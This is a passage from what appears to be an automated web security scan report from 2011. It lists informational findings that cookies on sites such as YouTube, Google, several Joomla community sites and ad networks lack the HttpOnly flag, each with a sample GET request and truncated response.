Path:	/watch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
VISITOR_INFO1_LIVE=oSlc8a237Qg; path=/; domain=.youtube.com; expires=Wed, 21-Sep-2011 22:36:38 GMT
GEO=76ddae6b596d22d70649c3f298d7779ecwsAAAAzVVOtwdbzTT3+9g==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: il.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.284. http://images.google.com/images previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.google.com
Path:	/images

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=28805e2640abba72:FF=0:TM=1295967942:LM=1295967942:S=XgbrdIg30yELc79u; expires=Thu, 24-Jan-2013 15:05:42 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.285. http://iphone.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://iphone.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=ad1cdf367a61d114c08b9bc313cec24d; expires=Tue, 01-Feb-2011 15:05:55 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: iphone.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.286. http://joomfa.org/joomla-16-persian.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomfa.org
Path:	/joomla-16-persian.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

16f55cf570d6624bbeb58e495d6f30df=a849d8a3dc9bc34166a8c90be1725ca5; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /joomla-16-persian.html HTTP/1.1
Host: joomfa.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 22:39:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: 16f55cf570d6624bbeb58e495d6f30df=a849d8a3dc9bc34166a8c90be1725ca5; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:39:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fa-ir" lang="fa-ir" >
<
...[SNIP]...

14.287. http://joomla.jp/news/1-projectnews/169-joomla-16-has-arrived.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomla.jp
Path:	/news/1-projectnews/169-joomla-16-has-arrived.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

7f6aa8350e5d9f947c38b269b8976dc4=4a235261b46f8b2ee986298970074f38; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /news/1-projectnews/169-joomla-16-has-arrived.html HTTP/1.1
Host: joomla.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.10-pl0-gentoo
Set-Cookie: 7f6aa8350e5d9f947c38b269b8976dc4=4a235261b46f8b2ee986298970074f38; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:37:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15767

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...

14.288. http://joomla.pl/powiadomienia/577-joomla-16-wydany.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomla.pl
Path:	/powiadomienia/577-joomla-16-wydany.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

4133b150d3474bb471372c7e0b1cd514=f7c7ef79892a51ea61ed57003bef1c55; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /powiadomienia/577-joomla-16-wydany.html HTTP/1.1
Host: joomla.pl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:37:05 GMT
Server: Apache
Set-Cookie: 4133b150d3474bb471372c7e0b1cd514=f7c7ef79892a51ea61ed57003bef1c55; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 24 Jan 2011 22:37:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30587

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" >
...[SNIP]...

14.289. http://joomladaywest.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomladaywest.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

f4aaeac59edff6688553483de8bbfaa8=a395c8457293151f4f06fc703f0be19c; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: joomladaywest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:24:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f4aaeac59edff6688553483de8bbfaa8=a395c8457293151f4f06fc703f0be19c; path=/
Last-Modified: Tue, 25 Jan 2011 16:24:27 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13838

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.290. http://joomladaywest.com/sponsors previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomladaywest.com
Path:	/sponsors

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

f4aaeac59edff6688553483de8bbfaa8=3f4a17211ce3ef3f5426d699b92295e9; path=/
rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:23:14 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sponsors HTTP/1.1
Host: joomladaywest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:23:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f4aaeac59edff6688553483de8bbfaa8=3f4a17211ce3ef3f5426d699b92295e9; path=/
Set-Cookie: rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:23:14 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 16:23:17 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.291. http://joomladaywest.com/the-conference/keynote-speakers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomladaywest.com
Path:	/the-conference/keynote-speakers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

f4aaeac59edff6688553483de8bbfaa8=936574c2ff061b089c217e85dbbff94a; path=/
rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:22:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /the-conference/keynote-speakers HTTP/1.1
Host: joomladaywest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 16:22:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f4aaeac59edff6688553483de8bbfaa8=936574c2ff061b089c217e85dbbff94a; path=/
Set-Cookie: rokweather_location=San+Jose%2C+CA; expires=Wed, 25-Jan-2012 16:22:53 GMT; path=/
Last-Modified: Tue, 25 Jan 2011 16:22:54 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<he
...[SNIP]...

14.292. http://joomlaportal.ru/content/view/2239/70/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://joomlaportal.ru
Path:	/content/view/2239/70/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

5fc991999f8b2e5e5bb2e3566d439f1f=be443c241334634b0c6c368448814be8; expires=Tue, 25-Jan-2011 10:41:10 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/view/2239/70/ HTTP/1.1
Host: joomlaportal.ru
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 24 Jan 2011 22:41:10 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.2.10
ETag: 62229839aa89cfd54c936ea9dd5cac22
Set-Cookie: 5fc991999f8b2e5e5bb2e3566d439f1f=be443c241334634b0c6c368448814be8; expires=Tue, 25-Jan-2011 10:41:10 GMT; path=/
Last-Modified: Tue, 11 Jan 2011 11:16:11 GMT
Content-Length: 20791

<?xml version="1.0" encoding="windows-1251"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19
...[SNIP]...

14.293. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

udm_0=MLvv8iEJPj5n5t4Ltt9EX/C7xZnl5hjzDNVGFWEzjcOGPSjwQeqblsz4NQqc0gDPHJGwQqP04Gl/fjd0NwxKE04RBfv6QDvz32B6fwU5Fu34L666BG4fi9tTCQB7HzLjsLqPpe/ZNv6p6Wv6E4ZBUtNIPMZXaK38wui6tKY7SLyOhMMPSJKHQjAq7iVOFpHQSiIVffpJbnNSOVw3KAaxc6ZIuNW0TwoNno2N7hLN8h5r0ETnNH1Wumo6MsJMHy6rUG0M0AVwc0C8t2sgjHPROMA7VMvEXCMRiwynjB1TRk/+PVfpEc1tHyJeAqnj0jneawiO5aIsZWU/7yPlu5ciMTLE8+z5XpS+HdjIJZiKw1Jd4rWuHlcWhdMmo0w4BgvLrRDX5hKPVKrZaofBbsFrLK+YUHM4qv2l8zWxk2A0eFUUwPQGjp4RSLamucNFvJcwuLIA/C4N0vTadc1XEiqHWN9m59nxOVRc25CL28bCg9D7XIK8eQGl39rH79pq83w2Y7yTdp2vq/JQyywuUIosSaihXjhZsv5zVjsGq0ous0noNBGVBibouZ6BUldR6RYnFDGvwwEsGVJSDLRRNx/p1i5vF0c5w+tOkuGmoQgKCEah+BLI3eY4IHERUjQHegjRiYhL18Bf95kytJzUyG1CQvSeHJOczvbE8rlrMExy1YkvWXbw0EkxMvneLlRouFMzUVJFJTrqMPWcsk2yKZjYh/ijo2o/CmAOTbQ5kX5IdSZG+Myf0KmUsYyDn3ob6Bqd0BC6gho3A+TkpwR3LAXJV+jj4sbj58smKFZBQAZVL97B2AHIadTbzX24S5gt3hJk6ySr2S1M1lWOdAtajdXelKAOgeKm2wNtK/Wy58LDt1SOkNjbuNw5upFoMJrUEnAHA3Gw0Zpesn5sqwSKrfo8m1ARoDsiZ17yITyYdiQgFv4=; Domain=.revsci.net; Expires=Tue, 24-Jan-2012 21:06:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

14.294. http://justinbieber.tweetmeme.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://justinbieber.tweetmeme.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

tm_identity=e7b93a4f4c08aa6fe8ee06832daf5cfd; expires=Tue, 01-Feb-2011 16:26:48 GMT; path=/; domain=.tweetmeme.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: justinbieber.tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.295. http://jxtended.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jxtended.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

6c37e8bd0240127217c04b915442f361=3ec280dd7e0fe2d662e6892192cf45b2; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: jxtended.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Expires: Sat, 05 Mar 2011 22:43:31 GMT
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: max-age=3456000
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Set-Cookie: 6c37e8bd0240127217c04b915442f361=3ec280dd7e0fe2d662e6892192cf45b2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Last-Modified: Mon, 24 Jan 2011 22:43:32 GMT
Pragma: no-cache
Date: Mon, 24 Jan 2011 22:43:32 GMT
Server: lighttpd/1.4.19
Content-Length: 14152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
<base
...[SNIP]...

14.296. http://k.collective-media.net/cmadj/cm.martini/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.martini/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cli=11de1c500e0115c; domain=collective-media.net; path=/; expires=Thu, 24-Jan-2013 16:30:36 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/cm.martini/ HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.297. http://khm0.google.com/kh/v/x3d76/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm0.google.com
Path:	/kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=a90843375ef24eb2:TM=1295973379:LM=1295973379:S=y00SfeV21WdWqUTv; expires=Thu, 24-Jan-2013 16:36:19 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.298. http://khm1.google.com/kh/v/x3d76/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm1.google.com
Path:	/kh/v/x3d76/x26

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=cf9e7ea08ee15b44:TM=1295973396:LM=1295973396:S=r_nSTLT0WyjGau-L; expires=Thu, 24-Jan-2013 16:36:36 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d76/x26 HTTP/1.1
Host: khm1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.299. http://khmdb0.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb0.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=a7f10d14c4f00411:TM=1295973412:LM=1295973412:S=4E7KVheBazHuNfU4; expires=Thu, 24-Jan-2013 16:36:52 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.300. http://khmdb1.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb1.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PREF=ID=bb0c184c4092797e:TM=1295973518:LM=1295973518:S=TQ6x1q9xqq1iW1xq; expires=Thu, 24-Jan-2013 16:38:38 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.301. http://kickapps.yuku.com/service/searchEverythingAsRss.kickAction previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kickapps.yuku.com
Path:	/service/searchEverythingAsRss.kickAction

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

as=40337; Expires=Wed, 26-Jan-2011 02:23:07 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /service/searchEverythingAsRss.kickAction?vars=service/searchEverything.kickAction&keywords=editorspick&includeVideo=on&includeAudio=on&includePhoto=on&includeBlog=on&includeUser=on&includeGroups=on&includeMessages=on&as=40337&quantity=25 HTTP/1.1
Host: kickapps.yuku.com
Proxy-Connection: keep-alive
Referer: http://serve.a-widget.com/service/getWidgetSwf.kickAction
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=2D292A4D71B9969B4DAEDD671301D676; as=40337

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:23:07 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: as=40337; Expires=Wed, 26-Jan-2011 02:23:07 GMT; Path=/
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-stale=0
P3P: policyref="http://www.yuku.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa HISa OUR NOR IND PHY ONL UNI COM NAV INT DEM PRE LOC"
Content-Type: text/xml;charset=UTF-8
Content-Length: 92452

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:apple-wallpapers="http://www.apple.com/
...[SNIP]...

14.302. http://km-kh.com/km/joomla-news/63-joomlar-16-has-arrived.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://km-kh.com
Path:	/km/joomla-news/63-joomlar-16-has-arrived.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bfc3e2967dd72ed37a11f38ece00cbdc=hb6tgivnu3fs856304vak8l845; path=/
lang=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/
jfcookie=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /km/joomla-news/63-joomlar-16-has-arrived.html HTTP/1.1
Host: km-kh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:09 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bfc3e2967dd72ed37a11f38ece00cbdc=hb6tgivnu3fs856304vak8l845; path=/
Set-Cookie: lang=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Sun, 24-Jan-2010 22:39:08 GMT; path=/
Set-Cookie: jfcookie[lang]=km; expires=Tue, 25-Jan-2011 22:39:09 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43929

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- KM-KH_Dome_PRO 1.5.0 - 9c85759485d4ad60e488bd5cc6161c7b4c1dd24defa833f5d
...[SNIP]...

14.303. http://kontentdesign.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kontentdesign.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

352408000473833862436b9fb7dcdeb1=6df78a54dbe3289d598ffc0f146b9b17; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: kontentdesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:39:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 352408000473833862436b9fb7dcdeb1=6df78a54dbe3289d598ffc0f146b9b17; path=/
Last-Modified: Mon, 24 Jan 2011 22:39:08 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...

14.304. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=inePNJpwIg02FVGCdbdRlhgohXUZwOoAM/oRTK7YDwAoGr7r1VQcKaMoGKGBI9YRaP53FkL3FG6gPbw6TVYxsu2B/0mBTea7IIaWGAH; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/
GUID=MTI5NTkwMzIwMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; domain=advertising.com; expires=Wed, 23-Jan-2013 21:06:42 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

14.305. http://loadus.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://loadus.exelator.com
Path:	/load/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxMDSzNzKxrASUcFEk%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
myPAL=eJxtzL0OwjAMRtF3iVcPtvPj2pkKLEiEAVWoK2NnRsS7k1bQic2yzncfnvy1ONWni3rgVAzMjIEpARWCqR%252BtfyTUxXllZWWav0wJiLgzpZ%252BSPbarf7HYWdpiQwYZclTDSKJ9JClv1fEw4fl6x1ub8XhpOJ7mUN8fByon7A%253D%253D; expires=Fri, 25-Mar-2011 21:06:41 GMT; path=/; domain=.exelator.com
BFF=eJytkb0OwiAUhd%252BFJ%252BBXCiytOtik1ERJo5Pp6Oxo%252Bu7eUjXYXAYS1%252B8cvpbDaJm0z4dl1JLAqPS1MYYTdweulYNAWOKPfTh019vQnttA3Gg5zZ3ZGDij3jxBP12RBGbmmq4%252FKxec%252FggYmm2oeaWENktQzYGIPAGfpqBca7UK2n5AFcCRJqo4%252BQuqAI40GdxXcyRA3bvOo27gSBNVNHvELSL%252Fggl%252FkTh05kWy%252B5fPXb7uH8cs3W56Ab%252BfvsY%253D; expires=Tue, 24-May-2011 21:06:41 GMT; path=/; domain=.exelator.com
